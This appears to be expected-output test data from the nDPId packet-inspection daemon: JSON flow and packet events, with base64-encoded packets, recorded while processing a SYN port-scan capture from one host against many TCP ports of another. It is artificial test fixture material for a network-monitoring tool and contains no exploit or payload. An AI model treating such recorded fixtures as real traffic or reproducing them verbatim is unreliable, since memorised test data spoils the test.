+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1450,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060642,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1450,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1440,"flow_packet_id":1,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060642,"pkt":"ACYLMQczACWzv5HuCABFAAAsMg8AACsG62OsEAAIQA2GNIzSG1zdUoMYAAAAAGACEAANMwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1451,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060642,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1451,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1441,"flow_packet_id":1,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060642,"pkt":"ACYLMQczACWzv5HuCABFAAAsul8AACgGZhOsEAAIQA2GNIzSzcHdUoMYAAAAAGACBABmzQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1452,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060642,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1452,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1442,"flow_packet_id":1,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060642,"pkt":"ACYLMQczACWzv5HuCABFAAAsl44AAC0Gg+SsEAAIQA2GNIzSH5HdUoMYAAAAAGACCAAQ\/gAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1453,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060642,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1453,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1443,"flow_packet_id":1,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060642,"pkt":"ACYLMQczACWzv5HuCABFAAAshnQAADQGjf6sEAAIQA2GNIzSwBfdUoMYAAAAAGACBAB0dwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1454,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060643,"flow_last_seen":1278275060643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060643,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3322,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1454,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1444,"flow_packet_id":1,"flow_last_seen":1278275060643,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060643,"pkt":"ACYLMQczACWzv5HuCABFAAAs1cMAADEGQa+sEAAIQA2GNIzTDPrdU4MZAAAAAGACCAAjkgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1455,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060644,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1455,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1445,"flow_packet_id":1,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060644,"pkt":"ACYLMQczACWzv5HuCABFAAAsdoQAACoGp+6sEAAIQA2GNIzTFqndU4MZAAAAAGACDAAV4wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1456,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060644,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1456,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1446,"flow_packet_id":1,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060644,"pkt":"ACYLMQczACWzv5HuCABFAAAsFmcAAC4GBAysEAAIQA2GNIzTAA3dU4MZAAAAAGACDAAsfwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1457,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060644,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3871,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1457,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1447,"flow_packet_id":1,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060644,"pkt":"ACYLMQczACWzv5HuCABFAAAsgdcAACwGmpusEAAIQA2GNIzTDx\/dU4MZAAAAAGACBAAlbQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1458,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060644,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":51103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1458,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1448,"flow_packet_id":1,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060644,"pkt":"ACYLMQczACWzv5HuCABFAAAsLsYAACgG8aysEAAIQA2GNIzTx5\/dU4MZAAAAAGACBABs7AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1459,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060644,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2809,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1459,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1449,"flow_packet_id":1,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060644,"pkt":"ACYLMQczACWzv5HuCABFAAAsiAkAADEGj2msEAAIQA2GNIzTCvndU4MZAAAAAGACCAAlkwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1460,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060644,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1460,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1450,"flow_packet_id":1,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060644,"pkt":"ACYLMQczACWzv5HuCABFAAAs8b4AAC8GJ7SsEAAIQA2GNIzTCFfdU4MZAAAAAGACEAAgNQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1461,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060644,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":37,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1461,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1451,"flow_packet_id":1,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060644,"pkt":"ACYLMQczACWzv5HuCABFAAAs48AAACcGPbKsEAAIQA2GNIzTACXdU4MZAAAAAGACEAAoZwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1462,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060661,"flow_last_seen":1278275060661,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060661,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1462,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1452,"flow_packet_id":1,"flow_last_seen":1278275060661,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060661,"pkt":"ACYLMQczACWzv5HuCABFAAAsBW4AADIGEQWsEAAIQA2GNIzTDQXdU4MZAAAAAGACDAAfhwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1463,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060661,"flow_last_seen":1278275060661,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060661,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1463,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1453,"flow_packet_id":1,"flow_last_seen":1278275060661,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060661,"pkt":"ACYLMQczACWzv5HuCABFAAAsrMwAAC4GbaasEAAIQA2GNIzTB+XdU4MZAAAAAGACDAAkpwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1464,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060693,"flow_last_seen":1278275060693,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060693,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1114,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1464,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1454,"flow_packet_id":1,"flow_last_seen":1278275060693,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060693,"pkt":"ACYLMQczACWzv5HuCABFAAAs8uUAACYGL42sEAAIQA2GNIzTBFrdU4MZAAAAAGACDAAoMgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1465,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1465,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1455,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsvn0AAC0GXPWsEAAIQA2GNIzTH0jdU4MZAAAAAGACCAARRAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1466,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1310,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1466,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1456,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsiAIAADgGiHCsEAAIQA2GNIzTBR7dU4MZAAAAAGACBAAvbgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1467,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1467,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1457,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsIScAAC0G+kusEAAIQA2GNIzTF3LdU4MZAAAAAGACCAAZGgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1468,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1468,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1458,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsoGcAADIGdgusEAAIQA2GNIzTAlHdU4MZAAAAAGACDAAqOwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1469,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":61900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1469,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1459,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAshhwAACcGm1asEAAIQA2GNIzT8czdU4MZAAAAAGACEAA2vwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1470,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1470,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1460,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsU1UAADoGux2sEAAIQA2GNIzTS5bdU4MZAAAAAGACDADg9QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1471,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1471,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1461,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsEgUAADgG\/m2sEAAIQA2GNIzTHz\/dU4MZAAAAAGACBAAVTQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1472,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1472,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1462,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsBjQAADAGEj+sEAAIQA2GNIzTYODdU4MZAAAAAGACBADTqwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1473,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3323,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1473,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1463,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsG38AADYG9vOsEAAIQA2GNIzTDPvdU4MZAAAAAGACDAAfkQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1474,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":407,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 